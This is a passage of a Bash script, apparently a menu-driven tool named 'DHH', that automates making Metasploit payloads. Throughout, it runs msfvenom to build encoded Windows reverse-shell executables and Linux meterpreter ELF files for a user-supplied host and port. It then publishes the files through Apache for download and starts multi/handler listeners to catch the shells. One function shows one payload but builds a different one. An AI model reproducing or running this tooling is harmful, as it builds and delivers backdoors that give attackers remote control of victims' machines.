$GREEN 726 | sleep 1 727 | echo "LPORT==>$BLUE $port"$GREEN 728 | echo 729 | echo "===========================" 730 | sleep 1 731 | echo 732 | echo -n "Enter name for payload=$RED" 733 | read name 734 | echo $GREEN 735 | sleep 1 736 | echo "NAME==>$BLUE $name "$GREEN 737 | echo 738 | echo "===========================" 739 | sleep 1 740 | echo 741 | clear 742 | echo 743 | echo 744 | echo " Payload [exe] Final Config: " 745 | echo "===================================" 746 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 747 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 748 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 749 | echo "$BLUE PAYLOAD $GREEN:>$RED windows/x64/shell/reverse_tcp $GREEN " 750 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/$name $GREEN" 751 | sleep 3 752 | cd $hh/Desktop/ 753 | if [ -d Output ];then 754 | echo 755 | echo "Found Output " 756 | sleep 1 757 | else 758 | mkdir Output 759 | fi 760 | cd .. 761 | wind=.exe 762 | echo 763 | echo 764 | sleep 1 765 | echo 766 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 767 | sleep 1 768 | xterm -T "DHH - Create [$name]" -geometry 99x23 -e "msfvenom -p windows/x64/shell/reverse_tcp -e x86/shikata_ga_nai -f exe LHOST=$host LPORT=$port > $hh/Desktop/Output/$name$wind" 769 | echo 770 | echo $BLUE"[*]$RED:$GREEN Done! " 771 | sleep 1 772 | echo 773 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 774 | cd $hh/Desktop/Output/ 775 | chmod +x $name$wind 776 | cp $name$wind /var/www/html 777 | echo 778 | echo "Done ! " 779 | sleep 2 780 | echo "" $GREEN 781 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 782 | sleep 2 783 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 784 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 785 | sleep 2 786 | echo 787 | echo "[*]Done apache server has been started " 788 | sleep 2 789 | echo 790 | echo 791 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 792 | echo 793 | echo 794 | sleep 7 795 | clear 796 | echo 797 | echo 798 | echo $BLUE" WHAT YOU WANT " 799 | echo $BLUE"================= " 800 | echo 801 | echo "1 - create Listener on [$GREEN $name $BLUE]" 802 | echo "2 - back to the menu " $GREEN 803 | echo 804 | echo -n "Enter choice ->> "$RED 805 | read choice 806 | if [ $choice = 1 ];then 807 | clear 808 | echo 809 | echo 810 | echo "starting Listener on $BLUE[ $name ]" 811 | sleep 1 812 | xterm -T "DHH - [$name] Listenner" -geometry 99x23 -e " msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD windows/x64/shell/reverse_tcp; exploit -j'" 813 | 814 | else 815 | 816 | if [ $choice = 2 ];then 817 | clear 818 | fi 819 | fi 820 | 821 | } 822 | 823 | sh_ipv6 () { 824 | clear 825 | echo 826 | echo 827 | echo "please wait.......... " 828 | sleep 2 829 | clear 830 | echo ""$BLUE 831 | echo "------------------------------------------" 832 | echo "Your Local IP Address:[ $myip " 833 | echo " " 834 | echo "Your Public IP Address:[ $myip2 " 835 | echo " " 836 | echo "------------------------------------------" 837 | echo "" $GREEN 838 | echo -n "Enter LHOST=$RED" 839 | read host 840 | echo ""$GREEN 841 | sleep 1 842 | echo "LHOST==>$BLUE $host "$GREEN 843 | echo 844 | echo "===========================" 845 | sleep 1 846 | echo 847 | echo -n "Enter LPORT=$RED" 848 | read port 849 | echo $GREEN 850 | sleep 1 851 | echo "LPORT==>$BLUE $port"$GREEN 852 | echo 853 | echo "===========================" 854 | sleep 1 855 | echo 856 | echo -n "Enter name for payload=$RED" 857 | read name 858 | echo $GREEN 859 | sleep 1 860 | echo "NAME==>$BLUE $name "$GREEN 861 | echo 862 | echo "===========================" 863 | sleep 1 864 | echo 865 | clear 866 | echo 867 | echo 868 | echo " Payload [exe] Final Config: " 869 | echo "===================================" 870 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 871 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 872 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 873 | echo "$BLUE PAYLOAD $GREEN:>$RED windows/shell/reverse_ipv6_tcp $GREEN " 874 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/$name $GREEN" 875 | sleep 3 876 | cd $hh/Desktop/ 877 | if [ -d Output ];then 878 | echo 879 | echo "Found Output " 880 | sleep 1 881 | else 882 | mkdir Output 883 | fi 884 | cd .. 885 | wind=.exe 886 | echo 887 | echo 888 | sleep 1 889 | echo 890 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 891 | sleep 1 892 | xterm -T "DHH - Create [$name]" -geometry 99x23 -e "msfvenom -p windows/shell/reverse_ipv6_tcp -e x86/shikata_ga_nai -f exe LHOST=$host LPORT=$port > $hh/Desktop/Output/$name$wind" 893 | echo 894 | echo $BLUE"[*]$RED:$GREEN Done! " 895 | sleep 1 896 | echo 897 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 898 | cd $hh/Desktop/Output/ 899 | chmod +x $name$wind 900 | cp $name$wind /var/www/html 901 | echo 902 | echo "Done ! " 903 | sleep 2 904 | echo "" $GREEN 905 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 906 | sleep 2 907 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 908 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 909 | sleep 2 910 | echo 911 | echo "[*]Done apache server has been started " 912 | sleep 2 913 | echo 914 | echo 915 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 916 | echo 917 | echo 918 | sleep 7 919 | clear 920 | echo 921 | echo 922 | echo $BLUE" WHAT YOU WANT " 923 | echo $BLUE"================= " 924 | echo 925 | echo "1 - create Listener on [$GREEN $name $BLUE]" 926 | echo "2 - back to the menu " $GREEN 927 | echo 928 | echo -n "Enter choice ->> "$RED 929 | read choice 930 | if [ $choice = 1 ];then 931 | clear 932 | echo 933 | echo 934 | echo "starting Listener on $BLUE[ $name ]" 935 | sleep 1 936 | xterm -T "DHH - [$name] Listenner" -geometry 99x23 -e " msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD windows/shell/reverse_ipv6_tcp; exploit -j'" 937 | 938 | else 939 | 940 | if [ $choice = 2 ];then 941 | clear 942 | fi 943 | fi 944 | 945 | } 946 | 947 | sh_non () { 948 | clear 949 | echo 950 | echo 951 | echo "please wait.......... " 952 | sleep 2 953 | clear 954 | echo ""$BLUE 955 | echo "------------------------------------------" 956 | echo "Your Local IP Address:[ $myip " 957 | echo " " 958 | echo "Your Public IP Address:[ $myip2 " 959 | echo " " 960 | echo "------------------------------------------" 961 | echo "" $GREEN 962 | echo -n "Enter LHOST=$RED" 963 | read host 964 | echo ""$GREEN 965 | sleep 1 966 | echo "LHOST==>$BLUE $host "$GREEN 967 | echo 968 | echo "===========================" 969 | sleep 1 970 | echo 971 | echo -n "Enter LPORT=$RED" 972 | read port 973 | echo $GREEN 974 | sleep 1 975 | echo "LPORT==>$BLUE $port"$GREEN 976 | echo 977 | echo "===========================" 978 | sleep 1 979 | echo 980 | echo -n "Enter name for payload=$RED" 981 | read name 982 | echo $GREEN 983 | sleep 1 984 | echo "NAME==>$BLUE $name "$GREEN 985 | echo 986 | echo "===========================" 987 | sleep 1 988 | echo 989 | clear 990 | echo 991 | echo 992 | echo " Payload [exe] Final Config: " 993 | echo "===================================" 994 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 995 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 996 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 997 | echo "$BLUE PAYLOAD $GREEN:>$RED windows/shell/reverse_nonx_tcp $GREEN " 998 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/$name $GREEN" 999 | sleep 3 1000 | cd $hh/Desktop/ 1001 | if [ -d Output ];then 1002 | echo 1003 | echo "Found Output " 1004 | sleep 1 1005 | else 1006 | mkdir Output 1007 | fi 1008 | cd .. 1009 | wind=.exe 1010 | echo 1011 | echo 1012 | sleep 1 1013 | echo 1014 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 1015 | sleep 1 1016 | xterm -T "DHH - Create [$name]" -geometry 99x23 -e "msfvenom -p windows/shell/reverse_nonx_tcp -e x86/shikata_ga_nai -f exe LHOST=$host LPORT=$port > $hh/Desktop/Output/$name$wind" 1017 | echo 1018 | echo $BLUE"[*]$RED:$GREEN Done! " 1019 | sleep 1 1020 | echo 1021 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 1022 | cd $hh/Desktop/Output/ 1023 | chmod +x $name$wind 1024 | cp $name$wind /var/www/html 1025 | echo 1026 | echo "Done ! " 1027 | sleep 2 1028 | echo "" $GREEN 1029 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 1030 | sleep 2 1031 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 1032 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 1033 | sleep 2 1034 | echo 1035 | echo "[*]Done apache server has been started " 1036 | sleep 2 1037 | echo 1038 | echo 1039 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 1040 | echo 1041 | echo 1042 | sleep 7 1043 | clear 1044 | echo 1045 | echo 1046 | echo $BLUE" WHAT YOU WANT " 1047 | echo $BLUE"================= " 1048 | echo 1049 | echo "1 - create Listener on [$GREEN $name $BLUE]" 1050 | echo "2 - back to the menu " $GREEN 1051 | echo 1052 | echo -n "Enter choice ->> "$RED 1053 | read choice 1054 | if [ $choice = 1 ];then 1055 | clear 1056 | echo 1057 | echo 1058 | echo "starting Listener on $BLUE[ $name ]" 1059 | sleep 1 1060 | xterm -T "DHH - [$name] Listenner" -geometry 99x23 -e " msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD windows/shell/reverse_nonx_tcp; exploit -j'" 1061 | 1062 | else 1063 | 1064 | if [ $choice = 2 ];then 1065 | clear 1066 | fi 1067 | fi 1068 | 1069 | } 1070 | 1071 | sh_ord () { 1072 | clear 1073 | echo 1074 | echo 1075 | echo "please wait.......... " 1076 | sleep 2 1077 | clear 1078 | echo ""$BLUE 1079 | echo "------------------------------------------" 1080 | echo "Your Local IP Address:[ $myip " 1081 | echo " " 1082 | echo "Your Public IP Address:[ $myip2 " 1083 | echo " " 1084 | echo "------------------------------------------" 1085 | echo "" $GREEN 1086 | echo -n "Enter LHOST=$RED" 1087 | read host 1088 | echo ""$GREEN 1089 | sleep 1 1090 | echo "LHOST==>$BLUE $host "$GREEN 1091 | echo 1092 | echo "===========================" 1093 | sleep 1 1094 | echo 1095 | echo -n "Enter LPORT=$RED" 1096 | read port 1097 | echo $GREEN 1098 | sleep 1 1099 | echo "LPORT==>$BLUE $port"$GREEN 1100 | echo 1101 | echo "===========================" 1102 | sleep 1 1103 | echo 1104 | echo -n "Enter name for payload=$RED" 1105 | read name 1106 | echo $GREEN 1107 | sleep 1 1108 | echo "NAME==>$BLUE $name "$GREEN 1109 | echo 1110 | echo "===========================" 1111 | sleep 1 1112 | echo 1113 | clear 1114 | echo 1115 | echo 1116 | echo " Payload [exe] Final Config: " 1117 | echo "===================================" 1118 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 1119 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 1120 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 1121 | echo "$BLUE PAYLOAD $GREEN:>$RED windows/shell/reverse_ord_tcp $GREEN " 1122 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/$name $GREEN" 1123 | sleep 3 1124 | cd $hh/Desktop/ 1125 | if [ -d Output ];then 1126 | echo 1127 | echo "Found Output " 1128 | sleep 1 1129 | else 1130 | mkdir Output 1131 | fi 1132 | cd .. 1133 | wind=.exe 1134 | echo 1135 | echo 1136 | sleep 1 1137 | echo 1138 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 1139 | sleep 1 1140 | xterm -T "DHH - Create [$name]" -geometry 99x23 -e "msfvenom -p windows/shell/reverse_ord_tcp -e x86/shikata_ga_nai -f exe LHOST=$host LPORT=$port > $hh/Desktop/Output/$name$wind" 1141 | echo 1142 | echo $BLUE"[*]$RED:$GREEN Done! " 1143 | sleep 1 1144 | echo 1145 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 1146 | cd $hh/Desktop/Output/ 1147 | chmod +x $name$wind 1148 | cp $name$wind /var/www/html 1149 | echo 1150 | echo "Done ! " 1151 | sleep 2 1152 | echo "" $GREEN 1153 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 1154 | sleep 2 1155 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 1156 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 1157 | sleep 2 1158 | echo 1159 | echo "[*]Done apache server has been started " 1160 | sleep 2 1161 | echo 1162 | echo 1163 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 1164 | echo 1165 | echo 1166 | sleep 7 1167 | clear 1168 | echo 1169 | echo 1170 | echo $BLUE" WHAT YOU WANT " 1171 | echo $BLUE"================= " 1172 | echo 1173 | echo "1 - create Listener on [$GREEN $name $BLUE]" 1174 | echo "2 - back to the menu " $GREEN 1175 | echo 1176 | echo -n "Enter choice ->> "$RED 1177 | read choice 1178 | if [ $choice = 1 ];then 1179 | clear 1180 | echo 1181 | echo 1182 | echo "starting Listener on $BLUE[ $name ]" 1183 | sleep 1 1184 | xterm -T "DHH - [$name] Listenner" -geometry 99x23 -e " msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD windows/shell/reverse_ord_tcp; exploit -j'" 1185 | 1186 | else 1187 | 1188 | if [ $choice = 2 ];then 1189 | clear 1190 | fi 1191 | fi 1192 | 1193 | } 1194 | 1195 | sh_allports () { 1196 | clear 1197 | echo 1198 | echo 1199 | echo "please wait.......... " 1200 | sleep 2 1201 | clear 1202 | echo ""$BLUE 1203 | echo "------------------------------------------" 1204 | echo "Your Local IP Address:[ $myip " 1205 | echo " " 1206 | echo "Your Public IP Address:[ $myip2 " 1207 | echo " " 1208 | echo "------------------------------------------" 1209 | echo "" $GREEN 1210 | echo -n "Enter LHOST=$RED" 1211 | read host 1212 | echo ""$GREEN 1213 | sleep 1 1214 | echo "LHOST==>$BLUE $host "$GREEN 1215 | echo 1216 | echo "===========================" 1217 | sleep 1 1218 | echo 1219 | echo -n "Enter LPORT=$RED" 1220 | read port 1221 | echo $GREEN 1222 | sleep 1 1223 | echo "LPORT==>$BLUE $port"$GREEN 1224 | echo 1225 | echo "===========================" 1226 | sleep 1 1227 | echo 1228 | echo -n "Enter name for payload=$RED" 1229 | read name 1230 | echo $GREEN 1231 | sleep 1 1232 | echo "NAME==>$BLUE $name "$GREEN 1233 | echo 1234 | echo "===========================" 1235 | sleep 1 1236 | echo 1237 | clear 1238 | echo 1239 | echo 1240 | echo " Payload [exe] Final Config: " 1241 | echo "===================================" 1242 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 1243 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 1244 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 1245 | echo "$BLUE PAYLOAD $GREEN:>$RED windows/shell/reverse_tcp_allports $GREEN " 1246 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/$name $GREEN" 1247 | sleep 3 1248 | cd $hh/Desktop/ 1249 | if [ -d Output ];then 1250 | echo 1251 | echo "Found Output " 1252 | sleep 1 1253 | else 1254 | mkdir Output 1255 | fi 1256 | cd .. 1257 | wind=.exe 1258 | echo 1259 | echo 1260 | sleep 1 1261 | echo 1262 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 1263 | sleep 1 1264 | xterm -T "DHH - Create [$name]" -geometry 99x23 -e "msfvenom -p windows/shell/reverse_tcp_allports -e x86/shikata_ga_nai -f exe LHOST=$host LPORT=$port > $hh/Desktop/Output/$name$wind" 1265 | echo 1266 | echo $BLUE"[*]$RED:$GREEN Done! " 1267 | sleep 1 1268 | echo 1269 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 1270 | cd $hh/Desktop/Output/ 1271 | chmod +x $name$wind 1272 | cp $name$wind /var/www/html 1273 | echo 1274 | echo "Done ! " 1275 | sleep 2 1276 | echo "" $GREEN 1277 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 1278 | sleep 2 1279 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 1280 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 1281 | sleep 2 1282 | echo 1283 | echo "[*]Done apache server has been started " 1284 | sleep 2 1285 | echo 1286 | echo 1287 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 1288 | echo 1289 | echo 1290 | sleep 7 1291 | clear 1292 | echo 1293 | echo 1294 | echo $BLUE" WHAT YOU WANT " 1295 | echo $BLUE"================= " 1296 | echo 1297 | echo "1 - create Listener on [$GREEN $name $BLUE]" 1298 | echo "2 - back to the menu " $GREEN 1299 | echo 1300 | echo -n "Enter choice ->> "$RED 1301 | read choice 1302 | if [ $choice = 1 ];then 1303 | clear 1304 | echo 1305 | echo 1306 | echo "starting Listener on $BLUE[ $name ]" 1307 | sleep 1 1308 | xterm -T "DHH - [$name] Listenner" -geometry 99x23 -e " msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD windows/shell/reverse_tcp_allports; exploit -j'" 1309 | 1310 | else 1311 | 1312 | if [ $choice = 2 ];then 1313 | clear 1314 | fi 1315 | fi 1316 | 1317 | } 1318 | 1319 | metbind () { 1320 | clear 1321 | echo 1322 | echo 1323 | echo "please wait.......... " 1324 | sleep 2 1325 | clear 1326 | echo ""$BLUE 1327 | echo "------------------------------------------" 1328 | echo "Your Local IP Address:[ $myip " 1329 | echo " " 1330 | echo "Your Public IP Address:[ $myip2 " 1331 | echo " " 1332 | echo "------------------------------------------" 1333 | echo "" $GREEN 1334 | echo -n "Enter KHOST=$RED" 1335 | read host 1336 | echo ""$GREEN 1337 | sleep 1 1338 | echo "KHOST==>$BLUE $host "$GREEN 1339 | echo 1340 | echo "===========================" 1341 | sleep 1 1342 | echo 1343 | echo -n "Enter LPORT=$RED" 1344 | read port 1345 | echo $GREEN 1346 | sleep 1 1347 | echo "LPORT==>$BLUE $port"$GREEN 1348 | echo 1349 | echo "===========================" 1350 | sleep 1 1351 | echo 1352 | echo -n "Enter name for payload=$RED" 1353 | read name 1354 | echo $GREEN 1355 | sleep 1 1356 | echo "NAME==>$BLUE $name "$GREEN 1357 | echo 1358 | echo "===========================" 1359 | sleep 1 1360 | echo 1361 | clear 1362 | echo 1363 | echo 1364 | echo " Payload [exe] Final Config: " 1365 | echo "===================================" 1366 | echo "$BLUE KHOST $GREEN:>$RED $host $GREEN" 1367 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 1368 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 1369 | echo "$BLUE PAYLOAD $GREEN:>$RED windows/meterpreter/bind_hidden_ipknock_tcp $GREEN " 1370 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/$name $GREEN" 1371 | sleep 3 1372 | cd $hh/Desktop/ 1373 | if [ -d Output ];then 1374 | echo 1375 | echo "Found Output " 1376 | sleep 1 1377 | else 1378 | mkdir Output 1379 | fi 1380 | cd .. 1381 | wind=.exe 1382 | echo 1383 | echo 1384 | sleep 1 1385 | echo 1386 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 1387 | sleep 1 1388 | xterm -T "DHH - Create [$name]" -geometry 99x23 -e "msfvenom -p windows/shell/reverse_tcp_allports -e x86/shikata_ga_nai -f exe KHOST=$host LPORT=$port > $hh/Desktop/Output/$name$wind" 1389 | echo 1390 | echo $BLUE"[*]$RED:$GREEN Done! " 1391 | sleep 1 1392 | echo 1393 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 1394 | cd $hh/Desktop/Output/ 1395 | chmod +x $name$wind 1396 | cp $name$wind /var/www/html 1397 | echo 1398 | echo "Done ! " 1399 | sleep 2 1400 | echo "" $GREEN 1401 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 1402 | sleep 2 1403 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 1404 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 1405 | sleep 2 1406 | echo 1407 | echo "[*]Done apache server has been started " 1408 | sleep 2 1409 | echo 1410 | echo 1411 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 1412 | echo 1413 | echo 1414 | sleep 7 1415 | clear 1416 | echo 1417 | echo 1418 | echo $BLUE" WHAT YOU WANT " 1419 | echo $BLUE"================= " 1420 | echo 1421 | echo "1 - create Listener on [$GREEN $name $BLUE]" 1422 | echo "2 - back to the menu " $GREEN 1423 | echo 1424 | echo -n "Enter choice ->> "$RED 1425 | read choice 1426 | if [ $choice = 1 ];then 1427 | clear 1428 | echo 1429 | echo 1430 | echo "starting Listener on $BLUE[ $name ]" 1431 | sleep 1 1432 | xterm -T "DHH - [$name] Listenner" -geometry 99x23 -e " msfconsole -x 'use exploit/multi/handler; set KHOST $host; set LPORT $port; set PAYLOAD windows/meterpreter/bind_hidden_ipknock_tcp; exploit -j'" 1433 | 1434 | else 1435 | 1436 | if [ $choice = 2 ];then 1437 | clear 1438 | fi 1439 | fi 1440 | 1441 | } 1442 | 1443 | 1444 | function wine { 1445 | clear 1446 | 1447 | cat << ! 1448 | 1449 | $RED 1450 | 1451 | ┌─┐─┐ ┬┌─┐┬ ┌─┐┬┌┬┐ ┬ ┬┬┌┐┌┌┬┐┌─┐┬ ┬┌─┐ 1452 | ├┤ ┌┴┬┘├─┘│ │ ││ │ │││││││ │││ ││││└─┐ 1453 | └─┘┴ └─┴ ┴─┘└─┘┴ ┴ └┴┘┴┘└┘─┴┘└─┘└┴┘└─┘$BLUE 1454 | 1455 | PAYLOADS 1456 | =========== $BLUE 1457 | 1458 | METERPRETER 1459 | ===========$GREEN 1460 | 1 $BLUE > windows/meterpreter/reverse_tcp $GREEN 1461 | 2 $BLUE > windows/meterpreter/reverse_http $GREEN 1462 | 3 $BLUE > windows/meterpreter/reverse_https $GREEN 1463 | 4 $BLUE > windows/meterpreter/bind_hidden_ipknock_tcp $BLUE 1464 | 1465 | 1466 | 1467 | SHELL 1468 | ========$GREEN 1469 | 5 $BLUE > windows/shell/reverse_tcp $GREEN 1470 | 6 $BLUE > windows/x64/shell/reverse_tcp $GREEN 1471 | 7 $BLUE > windows/shell/reverse_ipv6_tcp $GREEN 1472 | 8 $BLUE > windows/shell/reverse_nonx_tcp $GREEN 1473 | 9 $BLUE > windows/shell/reverse_ord_tcp $GREEN 1474 | 10$BLUE > windows/shell/reverse_tcp_allports $GREEN 1475 | 1476 | 1477 | 11$BLUE >$RED Exit $GREEN 1478 | 1479 | 1480 | ! 1481 | echo "============================================="$BLUE 1482 | echo 1483 | echo -n "choice payload :$RED " 1484 | read ch 1485 | case $ch in 1486 | 1)winre ;; 1487 | 2)winhtt ;; 1488 | 3)winhttps ;; 1489 | 4)metbind ;; 1490 | 5)sheel ;; 1491 | 6)sh_x64 ;; 1492 | 7)sh_ipv6 ;; 1493 | 8)sh_non ;; 1494 | 9)sh_ord ;; 1495 | 10)sh_allports ;; 1496 | 11)exie ;; 1497 | *) echo "\"$ch\":$RED[x]$BLUE The error of your choice does not exist"; sleep 2 ;; 1498 | esac 1499 | wine 1500 | } 1501 | 1502 | linre () { 1503 | clear 1504 | echo 1505 | echo 1506 | echo "please wait.......... " 1507 | sleep 2 1508 | clear 1509 | echo ""$BLUE 1510 | echo "------------------------------------------" 1511 | echo "Your Local IP Address:[ $myip " 1512 | echo " " 1513 | echo "Your Public IP Address:[ $myip2 " 1514 | echo " " 1515 | echo "------------------------------------------" 1516 | echo "" $GREEN 1517 | echo -n "Enter LHOST=$RED" 1518 | read host 1519 | echo ""$GREEN 1520 | sleep 1 1521 | echo "LHOST==>$BLUE $host "$GREEN 1522 | echo 1523 | echo "===========================" 1524 | sleep 1 1525 | echo 1526 | echo -n "Enter LPORT=$RED" 1527 | read port 1528 | echo $GREEN 1529 | sleep 1 1530 | echo "LPORT==>$BLUE $port"$GREEN 1531 | echo 1532 | echo "===========================" 1533 | sleep 1 1534 | echo 1535 | echo -n "Enter name for payload=$RED" 1536 | read name 1537 | echo $GREEN 1538 | sleep 1 1539 | echo "NAME==>$BLUE $name "$GREEN 1540 | echo 1541 | echo "===========================" 1542 | sleep 1 1543 | echo 1544 | clear 1545 | echo 1546 | echo 1547 | echo " Payload [elf] Final Config: " 1548 | echo "===================================" 1549 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 1550 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 1551 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 1552 | echo "$BLUE PAYLOAD $GREEN:>$RED linux/x86/meterpreter/reverse_tcp $GREEN " 1553 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/html/$name $GREEN" 1554 | sleep 3 1555 | cd $hh/Desktop/ 1556 | if [ -d Output ];then 1557 | echo 1558 | echo "Found Output " 1559 | sleep 1 1560 | else 1561 | mkdir Output 1562 | fi 1563 | cd .. 1564 | echo 1565 | echo 1566 | sleep 1 1567 | echo 1568 | lin=.elf 1569 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 1570 | sleep 1 1571 | xterm -T "DHH - Create [$name]" -geometry 99x23 -e "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$host LPORT=$port -a x86 --platform Linux -f elf > $hh/Desktop/Output/$name$lin" 1572 | echo 1573 | echo $BLUE"[*]$RED:$GREEN Done! " 1574 | sleep 1 1575 | echo 1576 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 1577 | cd $hh/Desktop/Output/ 1578 | chmod +x $name$lin 1579 | cp $name$lin /var/www/html 1580 | echo 1581 | echo "Done ! " 1582 | sleep 2 1583 | echo "" $GREEN 1584 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 1585 | sleep 2 1586 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 1587 | sleep 1 1588 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 1589 | sleep 2 1590 | echo 1591 | echo "[*]Done apache server has been started " 1592 | sleep 2 1593 | echo 1594 | echo 1595 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 1596 | echo 1597 | echo 1598 | sleep 7 1599 | clear 1600 | echo 1601 | echo 1602 | echo $BLUE" WHAT YOU WANT " 1603 | echo $BLUE"================= " 1604 | echo 1605 | echo "1 - create Listener on [$GREEN $name $BLUE]" 1606 | echo "2 - back to the menu " $GREEN 1607 | echo 1608 | echo -n "Enter choice ->> "$RED 1609 | read choice 1610 | if [ $choice = 1 ];then 1611 | clear 1612 | echo 1613 | echo 1614 | echo "starting Listener on $BLUE[ $name ]" 1615 | sleep 1 1616 | xterm -T "DHH - [$name] Listenner" -geometry 99x23 -e " msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD linux/x86/meterpreter/reverse_tcp; exploit -j'" 1617 | else 1618 | 1619 | if [ $choice = 2 ];then 1620 | clear 1621 | fi 1622 | fi 1623 | 1624 | } 1625 | 1626 | linu2 () { 1627 | clear 1628 | echo 1629 | echo 1630 | echo "please wait.......... " 1631 | sleep 2 1632 | clear 1633 | echo ""$BLUE 1634 | echo "------------------------------------------" 1635 | echo "Your Local IP Address:[ $myip " 1636 | echo " " 1637 | echo "Your Public IP Address:[ $myip2 " 1638 | echo " " 1639 | echo "------------------------------------------" 1640 | echo "" $GREEN 1641 | echo -n "Enter LHOST=$RED" 1642 | read host 1643 | echo ""$GREEN 1644 | sleep 1 1645 | echo "LHOST==>$BLUE $host "$GREEN 1646 | echo 1647 | echo "===========================" 1648 | sleep 1 1649 | echo 1650 | echo -n "Enter LPORT=$RED" 1651 | read port 1652 | echo $GREEN 1653 | sleep 1 1654 | echo "LPORT==>$BLUE $port"$GREEN 1655 | echo 1656 | echo "===========================" 1657 | sleep 1 1658 | echo 1659 | echo -n "Enter name for payload=$RED" 1660 | read name 1661 